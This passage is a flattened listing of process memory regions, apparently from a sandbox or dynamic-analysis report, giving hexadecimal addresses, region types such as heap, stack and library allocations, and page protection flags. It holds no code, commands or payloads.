page read and write
|
||
1FC25646000
|
heap
|
page read and write
|
||
20D43AFC000
|
heap
|
page read and write
|
||
266F36A4000
|
heap
|
page read and write
|
||
23DC3E30000
|
heap
|
page read and write
|
||
281FE173000
|
heap
|
page read and write
|
||
1FC2559D000
|
heap
|
page read and write
|
||
270D4054000
|
heap
|
page read and write
|
||
20C72E90000
|
heap
|
page read and write
|
||
1E8E41D5000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
76BB37E000
|
stack
|
page read and write
|
||
23AC79F4000
|
heap
|
page read and write
|
||
1E8E34F3000
|
trusted library allocation
|
page read and write
|
||
1C5500B0000
|
heap
|
page read and write
|
||
2CFCFCE000
|
stack
|
page read and write
|
||
23AC6129000
|
heap
|
page read and write
|
||
1E0D99A0000
|
direct allocation
|
page read and write
|
||
1FC255C7000
|
heap
|
page read and write
|
||
270D223A000
|
heap
|
page read and write
|
||
1E0E15EE000
|
heap
|
page read and write
|
||
24B86850000
|
heap
|
page read and write
|
||
267C199D000
|
heap
|
page read and write
|
||
239F6761000
|
trusted library allocation
|
page read and write
|
||
1E0D64DA000
|
heap
|
page read and write
|
||
7FFAA9790000
|
trusted library allocation
|
page read and write
|
||
7FFAA9650000
|
trusted library allocation
|
page read and write
|
||
1CEF25AF000
|
heap
|
page read and write
|
||
1F52B810000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
BAC7CFC000
|
stack
|
page read and write
|
||
8F79AFF000
|
stack
|
page read and write
|
||
1CEF2593000
|
heap
|
page read and write
|
||
266F36AE000
|
heap
|
page read and write
|
||
1C550089000
|
heap
|
page read and write
|
||
1690F754000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
7FFAA96A0000
|
trusted library allocation
|
page read and write
|
||
1DD0C759000
|
heap
|
page read and write
|
||
1CEF25B9000
|
heap
|
page read and write
|
||
28425E58000
|
heap
|
page read and write
|
||
1FC252EA000
|
heap
|
page read and write
|
||
1690F75B000
|
heap
|
page read and write
|
||
2484A7E2000
|
heap
|
page read and write
|
||
7FFAA96D0000
|
trusted library allocation
|
page read and write
|
||
267AA430000
|
trusted library allocation
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
7FF6DC744000
|
unkown
|
page readonly
|
||
2484A45E000
|
heap
|
page read and write
|
||
270D226C000
|
heap
|
page read and write
|
||
1DD0C792000
|
heap
|
page read and write
|
||
D5944FB000
|
stack
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
23AC79E0000
|
heap
|
page read and write
|
||
D8EBDFC000
|
stack
|
page read and write
|
||
1FC24A30000
|
direct allocation
|
page read and write
|
||
2484A170000
|
heap
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
2484A7E1000
|
heap
|
page read and write
|
||
1A2CE3B0000
|
heap
|
page read and write
|
||
1AB5E2A3000
|
heap
|
page read and write
|
||
267B9111000
|
trusted library allocation
|
page read and write
|
||
7FFAA95A0000
|
trusted library allocation
|
page read and write
|
||
1E7B5EA0000
|
heap
|
page read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
1FC255F2000
|
heap
|
page read and write
|
||
9A861BE000
|
stack
|
page read and write
|
||
270D4042000
|
heap
|
page read and write
|
||
B2B897F000
|
stack
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1407B200000
|
heap
|
page read and write
|
||
23AC5B07000
|
heap
|
page read and write
|
||
23AC5AC0000
|
heap
|
page read and write
|
||
1E0E2F90000
|
heap
|
page read and write
|
||
7FFB0BF6C000
|
unkown
|
page execute and read and write
|
||
1C550150000
|
trusted library allocation
|
page read and write
|
||
1C5500AF000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1C5500E3000
|
heap
|
page read and write
|
||
266F36C3000
|
heap
|
page read and write
|
||
1DD0FB2A000
|
heap
|
page read and write
|
||
16533617000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
2484A7E8000
|
heap
|
page read and write
|
||
1DD0E917000
|
heap
|
page read and write
|
||
7FFB0C5F1000
|
unkown
|
page execute and read and write
|
||
266F3097000
|
heap
|
page read and write
|
||
2484A170000
|
heap
|
page read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
7FFB0C5F0000
|
unkown
|
page readonly
|
||
267B9141000
|
trusted library allocation
|
page read and write
|
||
1FC25C4C000
|
direct allocation
|
page read and write
|
||
1407C190000
|
trusted library section
|
page readonly
|
||
1E0D648D000
|
heap
|
page read and write
|
||
1FC2611B000
|
heap
|
page read and write
|
||
1FC2560F000
|
heap
|
page read and write
|
||
7FF74EEE0000
|
unkown
|
page readonly
|
||
1FC25E2D000
|
heap
|
page read and write
|
||
1FC2567A000
|
heap
|
page read and write
|
||
1C550763000
|
heap
|
page read and write
|
||
51C291C000
|
stack
|
page read and write
|
||
1E0D645C000
|
heap
|
page read and write
|
||
2484A7D0000
|
heap
|
page read and write
|
||
1DD0E240000
|
heap
|
page read and write
|
||
26A1C4C0000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
281FC333000
|
heap
|
page read and write
|
||
1407B279000
|
heap
|
page read and write
|
||
7FF6DC72B000
|
unkown
|
page readonly
|
||
1FC24F55000
|
heap
|
page read and write
|
||
1FC2533E000
|
heap
|
page read and write
|
||
270D226A000
|
heap
|
page read and write
|
||
7FFB24AC0000
|
unkown
|
page readonly
|
||
270D2100000
|
heap
|
page read and write
|
||
1E0E2FB1000
|
heap
|
page read and write
|
||
1FC25358000
|
heap
|
page read and write
|
||
2484C194000
|
heap
|
page read and write
|
||
1FC22D29000
|
heap
|
page read and write
|
||
1CB96DF0000
|
heap
|
page read and write
|
||
2BA9E670000
|
heap
|
page read and write
|
||
D8143FF000
|
stack
|
page read and write
|
||
165335FD000
|
heap
|
page read and write
|
||
51D4778000
|
stack
|
page read and write
|
||
23AC5B5A000
|
heap
|
page read and write
|
||
281FC339000
|
heap
|
page read and write
|
||
1CEF204F000
|
heap
|
page read and write
|
||
202E5781000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
270D4044000
|
heap
|
page read and write
|
||
239E7ED3000
|
trusted library allocation
|
page read and write
|
||
1DEE7CAC000
|
heap
|
page read and write
|
||
281FC3F5000
|
heap
|
page read and write
|
||
1DD0FB2B000
|
heap
|
page read and write
|
||
165335EF000
|
heap
|
page read and write
|
||
1E8E36C4000
|
heap
|
page read and write
|
||
1FC255D6000
|
heap
|
page read and write
|
||
1FC25D57000
|
heap
|
page read and write
|
||
24BA3992000
|
heap
|
page read and write
|
||
1C550130000
|
heap
|
page read and write
|
||
1DD0C808000
|
heap
|
page read and write
|
||
272B2FC000
|
stack
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
1E0E1617000
|
heap
|
page read and write
|
||
2484A176000
|
heap
|
page read and write
|
||
87C00FE000
|
stack
|
page read and write
|
||
1FC25681000
|
heap
|
page read and write
|
||
23AC5B2A000
|
heap
|
page read and write
|
||
1E0E1604000
|
heap
|
page read and write
|
||
1CEF2093000
|
heap
|
page read and write
|
||
19DD4F11000
|
heap
|
page read and write
|
||
1407C780000
|
trusted library allocation
|
page read and write
|
||
20C72DB1000
|
heap
|
page read and write
|
||
1CEF223B000
|
heap
|
page read and write
|
||
267AA61A000
|
trusted library allocation
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
15C99A7A000
|
heap
|
page read and write
|
||
87C01FE000
|
stack
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
281FE184000
|
heap
|
page read and write
|
||
65B06FC000
|
stack
|
page read and write
|
||
1FC2530F000
|
heap
|
page read and write
|
||
1E0D64A6000
|
heap
|
page read and write
|
||
24BA3992000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1407C902000
|
heap
|
page read and write
|
||
1DD0FB13000
|
heap
|
page read and write
|
||
267AAEEA000
|
trusted library allocation
|
page read and write
|
||
D7418FE000
|
stack
|
page read and write
|
||
7FFAA95F0000
|
trusted library allocation
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1E0E2FB1000
|
heap
|
page read and write
|
||
23640869000
|
heap
|
page read and write
|
||
270D227C000
|
heap
|
page read and write
|
||
1407C750000
|
trusted library allocation
|
page read and write
|
||
245455DB000
|
heap
|
page read and write
|
||
267AAF2F000
|
trusted library allocation
|
page read and write
|
||
23AC79F4000
|
heap
|
page read and write
|
||
1A2CE3D0000
|
heap
|
page read and write
|
||
270D2207000
|
heap
|
page read and write
|
||
267A7580000
|
heap
|
page read and write
|
||
267C16F6000
|
heap
|
page execute and read and write
|
||
1E0E30A4000
|
heap
|
page read and write
|
||
1407CAF0000
|
remote allocation
|
page read and write
|
||
23AC5B6D000
|
heap
|
page read and write
|
||
7FFAA9501000
|
trusted library allocation
|
page read and write
|
||
19DD4F11000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
15C99A70000
|
heap
|
page read and write
|
||
27E84CF0000
|
heap
|
page read and write
|
||
281FC34E000
|
heap
|
page read and write
|
||
1E0E1592000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
1FC25F76000
|
heap
|
page read and write
|
||
7FFAA94F0000
|
trusted library allocation
|
page read and write
|
||
1FC25299000
|
heap
|
page read and write
|
||
1C550762000
|
heap
|
page read and write
|
||
1CEF40B0000
|
heap
|
page read and write
|
||
1FC25371000
|
heap
|
page read and write
|
||
7FFB0D736000
|
unkown
|
page readonly
|
||
244EE390000
|
heap
|
page read and write
|
||
2484A0C0000
|
heap
|
page read and write
|
||
1FC2611C000
|
heap
|
page read and write
|
||
7FFB0BB91000
|
unkown
|
page execute and read and write
|
||
1E0E15B4000
|
heap
|
page read and write
|
||
A2D7CFC000
|
stack
|
page read and write
|
||
1FC25626000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1E0E15E5000
|
heap
|
page read and write
|
||
281FC2F7000
|
heap
|
page read and write
|
||
1E8E403F000
|
heap
|
page read and write
|
||
7FF74EEF8000
|
unkown
|
page read and write
|
||
1E0E15BE000
|
heap
|
page read and write
|
||
1E0E15B4000
|
heap
|
page read and write
|
||
1FC22D24000
|
heap
|
page read and write
|
||
1C552200000
|
heap
|
page read and write
|
||
28425E4A000
|
heap
|
page read and write
|
||
1FC2527D000
|
heap
|
page read and write
|
||
7FFB1E471000
|
unkown
|
page execute and read and write
|
||
7FFAA96B8000
|
trusted library allocation
|
page read and write
|
||
266F3083000
|
heap
|
page read and write
|
||
7FFAA93DC000
|
trusted library allocation
|
page execute and read and write
|
||
266F3090000
|
heap
|
page read and write
|
||
1DD0C808000
|
heap
|
page read and write
|
||
7FFAA96B0000
|
trusted library allocation
|
page read and write
|
||
1BCD0CA0000
|
heap
|
page read and write
|
||
22972E00000
|
heap
|
page read and write
|
||
1FC24F6E000
|
heap
|
page read and write
|
||
1C5500B1000
|
heap
|
page read and write
|
||
7FFB0B804000
|
unkown
|
page execute and read and write
|
||
29AC2362000
|
heap
|
page read and write
|
||
7FFB24ACC000
|
unkown
|
page execute and write copy
|
||
1FC25170000
|
heap
|
page read and write
|
||
1FC2613B000
|
heap
|
page read and write
|
||
1FC25C2C000
|
direct allocation
|
page read and write
|
||
1FC25635000
|
heap
|
page read and write
|
||
7FFB0C5C0000
|
unkown
|
page readonly
|
||
7FFB1C3C7000
|
unkown
|
page readonly
|
||
51D41FE000
|
stack
|
page read and write
|
||
1FC24F4F000
|
heap
|
page read and write
|
||
1DEE7C20000
|
heap
|
page read and write
|
||
E6C131B000
|
stack
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1FC22D86000
|
heap
|
page read and write
|
||
1FC24F4C000
|
heap
|
page read and write
|
||
2DE1CC00000
|
heap
|
page read and write
|
||
281FC325000
|
heap
|
page read and write
|
||
1CEF2075000
|
heap
|
page read and write
|
||
1FC2536A000
|
heap
|
page read and write
|
||
270D27AC000
|
heap
|
page read and write
|
||
26379E5A000
|
heap
|
page read and write
|
||
281FC3F0000
|
heap
|
page read and write
|
||
1C5500C2000
|
heap
|
page read and write
|
||
7FFB1BB10000
|
unkown
|
page readonly
|
||
21B1BD80000
|
heap
|
page read and write
|
||
23AC60FA000
|
heap
|
page read and write
|
||
7FFB0BFB6000
|
unkown
|
page execute and read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
281FC341000
|
heap
|
page read and write
|
||
7FFAA9540000
|
trusted library allocation
|
page execute and read and write
|
||
281FC3F7000
|
heap
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
1FC22D71000
|
heap
|
page read and write
|
||
1E8E3FF1000
|
heap
|
page read and write
|
||
1C550782000
|
heap
|
page read and write
|
||
1E4CFA1D000
|
heap
|
page read and write
|
||
281FE175000
|
heap
|
page read and write
|
||
239E491A000
|
heap
|
page read and write
|
||
2484A7F9000
|
heap
|
page read and write
|
||
1CEF268E000
|
heap
|
page read and write
|
||
2DE1CB00000
|
heap
|
page read and write
|
||
267C19C5000
|
heap
|
page read and write
|
||
1E0E15F9000
|
heap
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
23AC79EE000
|
heap
|
page read and write
|
||
1E8E3518000
|
trusted library allocation
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
7FFB1E4C0000
|
unkown
|
page readonly
|
||
1BCD0D80000
|
heap
|
page read and write
|
||
267AAA5D000
|
trusted library allocation
|
page read and write
|
||
B26CBEF000
|
stack
|
page read and write
|
||
1FC26164000
|
heap
|
page read and write
|
||
270D27C9000
|
heap
|
page read and write
|
||
239E67D9000
|
trusted library allocation
|
page read and write
|
||
23AC612C000
|
heap
|
page read and write
|
||
23AC6117000
|
heap
|
page read and write
|
||
76BC44E000
|
stack
|
page read and write
|
||
4C539AB000
|
stack
|
page read and write
|
||
1407B313000
|
heap
|
page read and write
|
||
1E0D9BAD000
|
direct allocation
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
1407BB1A000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
281FC41A000
|
heap
|
page read and write
|
||
1FC251C9000
|
heap
|
page read and write
|
||
23AC5B57000
|
heap
|
page read and write
|
||
51D49FF000
|
stack
|
page read and write
|
||
7FFAA9436000
|
trusted library allocation
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
1E0D6471000
|
heap
|
page read and write
|
||
1DD0FAB4000
|
heap
|
page read and write
|
||
2BA9E6E1000
|
heap
|
page read and write
|
||
1407B243000
|
heap
|
page read and write
|
||
1E8E3FE2000
|
heap
|
page read and write
|
||
2940C32B000
|
heap
|
page read and write
|
||
1FC251AB000
|
heap
|
page read and write
|
||
270D21DF000
|
heap
|
page read and write
|
||
1E5FA860000
|
heap
|
page read and write
|
||
1AB5E272000
|
heap
|
page read and write
|
||
1407C82C000
|
heap
|
page read and write
|
||
23195DE0000
|
heap
|
page read and write
|
||
2DE1CA20000
|
heap
|
page read and write
|
||
1407C854000
|
heap
|
page read and write
|
||
1FC25BCC000
|
direct allocation
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
25D4E120000
|
heap
|
page read and write
|
||
81CE0FF000
|
stack
|
page read and write
|
||
1E5FA782000
|
heap
|
page read and write
|
||
239FEA5C000
|
heap
|
page read and write
|
||
23AC5B59000
|
heap
|
page read and write
|
||
239E491D000
|
heap
|
page read and write
|
||
82523AE000
|
stack
|
page read and write
|
||
1AD18B31000
|
heap
|
page read and write
|
||
1FC25C64000
|
direct allocation
|
page read and write
|
||
1FC2573A000
|
heap
|
page read and write
|
||
B26CB67000
|
stack
|
page read and write
|
||
7FFAA940C000
|
trusted library allocation
|
page execute and read and write
|
||
1E0D649E000
|
heap
|
page read and write
|
||
1E0E1595000
|
heap
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
1C55077C000
|
heap
|
page read and write
|
||
1FC2566D000
|
heap
|
page read and write
|
||
1DEE7C60000
|
heap
|
page read and write
|
||
6089D0F000
|
stack
|
page read and write
|
||
29AC2362000
|
heap
|
page read and write
|
||
1407C790000
|
trusted library allocation
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
7FFAA9610000
|
trusted library allocation
|
page read and write
|
||
26395BA7000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
1EA23100000
|
heap
|
page read and write
|
||
1FC25C1C000
|
direct allocation
|
page read and write
|
||
270D2454000
|
heap
|
page read and write
|
||
1FC25359000
|
heap
|
page read and write
|
||
1690F738000
|
heap
|
page read and write
|
||
16533737000
|
heap
|
page read and write
|
||
1FC25550000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
76BAFDE000
|
stack
|
page read and write
|
||
27EA9980000
|
heap
|
page read and write
|
||
270D227C000
|
heap
|
page read and write
|
||
19DD4F11000
|
heap
|
page read and write
|
||
1FC255A2000
|
heap
|
page read and write
|
||
7FFAA9406000
|
trusted library allocation
|
page read and write
|
||
22972FA0000
|
heap
|
page read and write
|
||
270D2120000
|
heap
|
page read and write
|
||
157807E000
|
stack
|
page read and write
|
||
23AC5B5D000
|
heap
|
page read and write
|
||
CDBDD7F000
|
stack
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
1FC255FA000
|
heap
|
page read and write
|
||
EE6D7BF000
|
stack
|
page read and write
|
||
1690F74D000
|
heap
|
page read and write
|
||
1C5500BD000
|
heap
|
page read and write
|
||
886C0FF000
|
stack
|
page read and write
|
||
2484A137000
|
heap
|
page read and write
|
||
7FFAA96A9000
|
trusted library allocation
|
page read and write
|
||
8251BD9000
|
stack
|
page read and write
|
||
1700B897000
|
heap
|
page read and write
|
||
1C552010000
|
heap
|
page read and write
|
||
B08A53B000
|
stack
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
2484C186000
|
heap
|
page read and write
|
||
1FC2536B000
|
heap
|
page read and write
|
||
270D222A000
|
heap
|
page read and write
|
||
1FC22D6A000
|
heap
|
page read and write
|
||
281FC3E8000
|
heap
|
page read and write
|
||
1FC25569000
|
heap
|
page read and write
|
||
1EA23108000
|
heap
|
page read and write
|
||
1DEE7F44000
|
heap
|
page read and write
|
||
281FC250000
|
heap
|
page read and write
|
||
1407C6D0000
|
trusted library allocation
|
page read and write
|
||
1DD0F4C8000
|
heap
|
page read and write
|
||
281FC517000
|
heap
|
page read and write
|
||
1E4CF9E5000
|
heap
|
page read and write
|
||
1DD0C734000
|
heap
|
page read and write
|
||
1E0E1571000
|
heap
|
page read and write
|
||
28425E35000
|
heap
|
page read and write
|
||
1DD0C797000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
28425E3B000
|
heap
|
page read and write
|
||
267C1916000
|
heap
|
page read and write
|
||
1CEF2092000
|
heap
|
page read and write
|
||
266F3200000
|
heap
|
page read and write
|
||
267C19BA000
|
heap
|
page read and write
|
||
266F4F53000
|
heap
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
28425E5D000
|
heap
|
page read and write
|
||
1FC2533E000
|
heap
|
page read and write
|
||
83C6EFF000
|
stack
|
page read and write
|
||
1FC255B2000
|
heap
|
page read and write
|
||
266F3085000
|
heap
|
page read and write
|
||
2090AA80000
|
heap
|
page read and write
|
||
239FE81D000
|
heap
|
page read and write
|
||
239F6919000
|
trusted library allocation
|
page read and write
|
||
22972EC2000
|
heap
|
page read and write
|
||
15771FE000
|
unkown
|
page readonly
|
||
1FC2533A000
|
heap
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
16533751000
|
heap
|
page read and write
|
||
281FC409000
|
heap
|
page read and write
|
||
1E8E34FF000
|
trusted library allocation
|
page read and write
|
||
27EA9BB4000
|
heap
|
page read and write
|
||
7FFAA95D0000
|
trusted library allocation
|
page read and write
|
||
7FFAA9470000
|
trusted library allocation
|
page execute and read and write
|
||
2484A118000
|
heap
|
page read and write
|
||
1C550784000
|
heap
|
page read and write
|
||
2322B390000
|
heap
|
page read and write
|
||
25D4E191000
|
heap
|
page read and write
|
||
2484C196000
|
heap
|
page read and write
|
||
1E0D64E1000
|
heap
|
page read and write
|
||
2422BC20000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1E8E41D5000
|
heap
|
page read and write
|
||
2584D9D0000
|
heap
|
page read and write
|
||
2484A137000
|
heap
|
page read and write
|
||
7FFB0C3C4000
|
unkown
|
page execute and read and write
|
||
544A4FB000
|
stack
|
page read and write
|
||
2484A7EC000
|
heap
|
page read and write
|
||
1CE587CB000
|
heap
|
page read and write
|
||
D1D1E7C000
|
stack
|
page read and write
|
||
239E49C0000
|
heap
|
page readonly
|
||
7FFAA9600000
|
trusted library allocation
|
page read and write
|
||
270D27A0000
|
heap
|
page read and write
|
||
1FC2519E000
|
heap
|
page read and write
|
||
1E0E15B6000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1CEF1FE0000
|
heap
|
page read and write
|
||
1E8E41D0000
|
heap
|
page read and write
|
||
26395E80000
|
heap
|
page read and write
|
||
19DD4F11000
|
heap
|
page read and write
|
||
1DCE30F2000
|
heap
|
page read and write
|
||
239FE79C000
|
heap
|
page read and write
|
||
1E0E160D000
|
heap
|
page read and write
|
||
1FC25368000
|
heap
|
page read and write
|
||
2CFCBED000
|
stack
|
page read and write
|
||
266F3085000
|
heap
|
page read and write
|
||
19BC6519000
|
heap
|
page read and write
|
||
1C552014000
|
heap
|
page read and write
|
||
1DD0FAA0000
|
heap
|
page read and write
|
||
1F52B8B0000
|
heap
|
page read and write
|
||
266F36E4000
|
heap
|
page read and write
|
||
1E0E15DF000
|
heap
|
page read and write
|
||
1CEF20A7000
|
heap
|
page read and write
|
||
1C55012A000
|
heap
|
page read and write
|
||
236408BE000
|
heap
|
page read and write
|
||
1E8E405B000
|
heap
|
page read and write
|
||
1E0E17EC000
|
heap
|
page read and write
|
||
1E0D64C3000
|
heap
|
page read and write
|
||
267B93FB000
|
trusted library allocation
|
page read and write
|
||
236408C1000
|
heap
|
page read and write
|
||
2BA9E7C0000
|
heap
|
page read and write
|
||
1CEF2680000
|
heap
|
page read and write
|
||
15778FE000
|
unkown
|
page readonly
|
||
7FFAA9350000
|
trusted library allocation
|
page read and write
|
||
1E8E41E2000
|
heap
|
page read and write
|
||
267C160A000
|
heap
|
page read and write
|
||
1DD0C739000
|
heap
|
page read and write
|
||
76BBA7B000
|
stack
|
page read and write
|
||
1E0D6460000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
24B86AB4000
|
heap
|
page read and write
|
||
1C550133000
|
heap
|
page read and write
|
||
1DEE7CBB000
|
heap
|
page read and write
|
||
9A860B8000
|
stack
|
page read and write
|
||
1FC251C9000
|
heap
|
page read and write
|
||
244EE0C0000
|
heap
|
page read and write
|
||
270D2224000
|
heap
|
page read and write
|
||
20D43AE7000
|
heap
|
page read and write
|
||
23AC6134000
|
heap
|
page read and write
|
||
1FC252E8000
|
heap
|
page read and write
|
||
7FF6DC700000
|
unkown
|
page readonly
|
||
1CEF2591000
|
heap
|
page read and write
|
||
1690F74B000
|
heap
|
page read and write
|
||
1CEF25B5000
|
heap
|
page read and write
|
||
239FE760000
|
heap
|
page read and write
|
||
1FC253B0000
|
heap
|
page read and write
|
||
2C25EF10000
|
heap
|
page read and write
|
||
1FC25325000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1FC25627000
|
heap
|
page read and write
|
||
1FC2531B000
|
heap
|
page read and write
|
||
1407B1E0000
|
trusted library section
|
page read and write
|
||
28425E3B000
|
heap
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
1E0D64C1000
|
heap
|
page read and write
|
||
1AB5E2A3000
|
heap
|
page read and write
|
||
7FFB0C438000
|
unkown
|
page execute and read and write
|
||
266F36AA000
|
heap
|
page read and write
|
||
1B3A8150000
|
heap
|
page read and write
|
||
1FC25626000
|
heap
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
267A772F000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
281FC409000
|
heap
|
page read and write
|
||
239FE8D0000
|
heap
|
page execute and read and write
|
||
1DCE3080000
|
heap
|
page read and write
|
||
267A7770000
|
heap
|
page read and write
|
||
9E5D4C000
|
stack
|
page read and write
|
||
1E5FA772000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
1CEF268A000
|
heap
|
page read and write
|
||
267AA8CF000
|
trusted library allocation
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1CEF2588000
|
heap
|
page read and write
|
||
1CEF1FB0000
|
trusted library allocation
|
page read and write
|
||
1407B1A0000
|
heap
|
page read and write
|
||
281FC40A000
|
heap
|
page read and write
|
||
1FC25C38000
|
direct allocation
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
1FC25C58000
|
direct allocation
|
page read and write
|
||
2584DACB000
|
heap
|
page read and write
|
||
1E8E36C0000
|
heap
|
page read and write
|
||
7FFB0BB62000
|
unkown
|
page execute and read and write
|
||
1E8E405B000
|
heap
|
page read and write
|
||
1CEF25AA000
|
heap
|
page read and write
|
||
266F4F5E000
|
heap
|
page read and write
|
||
266F36B7000
|
heap
|
page read and write
|
||
1FC2536E000
|
heap
|
page read and write
|
||
7FFB0C411000
|
unkown
|
page execute and read and write
|
||
1FC24F4E000
|
heap
|
page read and write
|
||
1E0D7EA0000
|
direct allocation
|
page read and write
|
||
1C550063000
|
heap
|
page read and write
|
||
1DEE7CBB000
|
heap
|
page read and write
|
||
267A7710000
|
heap
|
page read and write
|
||
20D43B0D000
|
heap
|
page read and write
|
||
1FC25607000
|
heap
|
page read and write
|
||
267AA622000
|
trusted library allocation
|
page read and write
|
||
7FF6DC744000
|
unkown
|
page readonly
|
||
1FC25626000
|
heap
|
page read and write
|
||
1E0E15BD000
|
heap
|
page read and write
|
||
281FE184000
|
heap
|
page read and write
|
||
1E5FA76B000
|
heap
|
page read and write
|
||
2DE1CEE4000
|
heap
|
page read and write
|
||
1E5FA778000
|
heap
|
page read and write
|
||
270D27D3000
|
heap
|
page read and write
|
||
1DD0FAC8000
|
heap
|
page read and write
|
||
1E0D645F000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
20D43AFE000
|
heap
|
page read and write
|
||
239E7E21000
|
trusted library allocation
|
page read and write
|
||
4C53DFE000
|
stack
|
page read and write
|
||
2BA9E640000
|
heap
|
page read and write
|
||
15764FE000
|
stack
|
page read and write
|
||
267A9FD6000
|
trusted library allocation
|
page read and write
|
||
1C55076A000
|
heap
|
page read and write
|
||
236408F9000
|
heap
|
page read and write
|
||
7FF6DC73E000
|
unkown
|
page write copy
|
||
1FC2613B000
|
heap
|
page read and write
|
||
1CEF20AC000
|
heap
|
page read and write
|
||
1FC25E7E000
|
heap
|
page read and write
|
||
1407C84F000
|
heap
|
page read and write
|
||
281FC51A000
|
heap
|
page read and write
|
||
1EA230F0000
|
heap
|
page read and write
|
||
23AC5C40000
|
heap
|
page read and write
|
||
D8D53FF000
|
unkown
|
page read and write
|
||
23097CA0000
|
heap
|
page read and write
|
||
1690F74D000
|
heap
|
page read and write
|
||
1FC25C54000
|
direct allocation
|
page read and write
|
||
1CEF3F73000
|
heap
|
page read and write
|
||
7FFB0C59E000
|
unkown
|
page execute and read and write
|
||
B08A8FF000
|
unkown
|
page read and write
|
||
266F50E0000
|
heap
|
page read and write
|
||
239F67D7000
|
trusted library allocation
|
page read and write
|
||
1AD18AA0000
|
heap
|
page read and write
|
||
1C550050000
|
heap
|
page read and write
|
||
15C99C40000
|
heap
|
page read and write
|
||
1FC25331000
|
heap
|
page read and write
|
||
1DCE30D0000
|
heap
|
page read and write
|
||
1CEF20B8000
|
heap
|
page read and write
|
||
26A1C540000
|
heap
|
page read and write
|
||
1FC256BE000
|
heap
|
page read and write
|
||
7FFAA96BC000
|
trusted library allocation
|
page read and write
|
||
1C55201E000
|
heap
|
page read and write
|
||
1FC25336000
|
heap
|
page read and write
|
||
239E489D000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1FC24EDE000
|
heap
|
page read and write
|
||
B26CE7F000
|
stack
|
page read and write
|
||
7FFAA937B000
|
trusted library allocation
|
page execute and read and write
|
||
267C1870000
|
heap
|
page read and write
|
||
2484A45A000
|
heap
|
page read and write
|
||
19BC6521000
|
heap
|
page read and write
|
||
1DD0C80B000
|
heap
|
page read and write
|
||
1FC24F4F000
|
heap
|
page read and write
|
||
1FC2613B000
|
heap
|
page read and write
|
||
165335ED000
|
heap
|
page read and write
|
||
267C16A6000
|
heap
|
page read and write
|
||
1FC253D5000
|
heap
|
page read and write
|
||
51D4A7C000
|
stack
|
page read and write
|
||
1DD0C807000
|
heap
|
page read and write
|
||
1C55201D000
|
heap
|
page read and write
|
||
1690F727000
|
heap
|
page read and write
|
||
1E5FA994000
|
heap
|
page read and write
|
||
7FFB0D742000
|
unkown
|
page readonly
|
||
29AC234B000
|
heap
|
page read and write
|
||
8F952FF000
|
stack
|
page read and write
|
||
7FFAA9531000
|
trusted library allocation
|
page read and write
|
||
7FFAA95A0000
|
trusted library allocation
|
page read and write
|
||
1DD0FAC9000
|
heap
|
page read and write
|
||
7FFB0D742000
|
unkown
|
page readonly
